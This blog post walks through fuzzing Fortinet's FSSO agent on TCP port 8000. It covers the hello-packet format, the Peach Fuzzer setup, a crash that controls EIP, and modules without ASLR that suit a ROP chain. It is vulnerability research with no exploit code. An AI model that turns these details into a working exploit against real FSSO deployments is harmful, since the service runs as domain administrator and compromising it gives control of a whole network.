Last week Enrique Nissim of Core Security published an article called Analysis of a Remote Code Execution Vulnerability on Fortinet Single Sign On. Lately I’ve been using Deva Vu Security’s excellent Peach Fuzzer to find vulnerabilities, and I wanted to see how easy this would be to reproduce.
First, I installed Wireshark, Windbg, Peach 3 and FSSO 4.3.143 onto a Windows 2008 R2 server VM. While Windows 2008 R2 is 64-bit only, FSSO is always 32-bit, which should make writing the exploit simpler. Next, I loaded up a FortiGate VM and configured FSSO according to the documentation. All Fortinet products can be downloaded and trialed for 14-days which makes vulnerability hunting a breeze, although you will have to set up an account first.
As indicated by Enrique’s article, FSSO communicates via TCP port 8000. A Wireshark capture shows the structure of the hello packet:
The capture shows the packet format as follows:
- A packet header, comprised of 32-bit big endian size field of the whole payload including the size field, a tag value of 80, and a type value of 06. These tag and type value correspond to a hello packet.
- TLV-like structures, with the same size, tag, type and value structures.
- TLVs for version, serial number and an MD5 authentication hash.
Peach fuzzer uses XML to describe how to fuzz a target. The portion of the XML that describes the packet format is the data model. Other sections include a state model, which describes stateful protocols (we’re only fuzzing the hello packet), an agent, which describes how to instrument the target, and a test, which describes how to interface with the target. The full Peach Pit can be found on github.
Running the Peach Pit is simple. I’ve installed Peach into the directory c:\peach on the Windows 2008 R2 VM. You can start fuzzing by copying the Pit to the peach directory and running “peach.exe fsso.xml”.
After only 41 fuzz runs, I obtained the following crash:
(13f8.e54): Access violation - code c0000005 (first chance) eax=fffffffe ebx=00000658 ecx=75e898da edx=1c781104 esi=ffffffff edi=1c7e2ce8 eip=41414141 esp=1cbbfe1c ebp=00000000 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 41414141 ?? ???
Textbook stack buffer overflow. To make the situation worse, two modules in the FSSO service do not use ASLR:
So we know we can get 0x41414141, and we know we have at least two modules that do not have ASLR enabled, and one of them contains address values with no nulls, which is perfect for a ROP chain.
FSSO usually runs as domain administrator. If we’re able to exploit this service we effectively have control over the entire network. While Fortinet might not be a common household name like Cisco or Microsoft, Fortinet has sold over a million firewalls and FSSO is widely deployed. It is also quite likely that there are other vulnerabilities in this service, such as the DCAgent protocol running on UDP port 8002 (which is also enabled by default). Next week I’ll demonstrate how to build a working Metasploit module for this vulnerability, and we’ll try some fuzzing of the DCAgent protocol.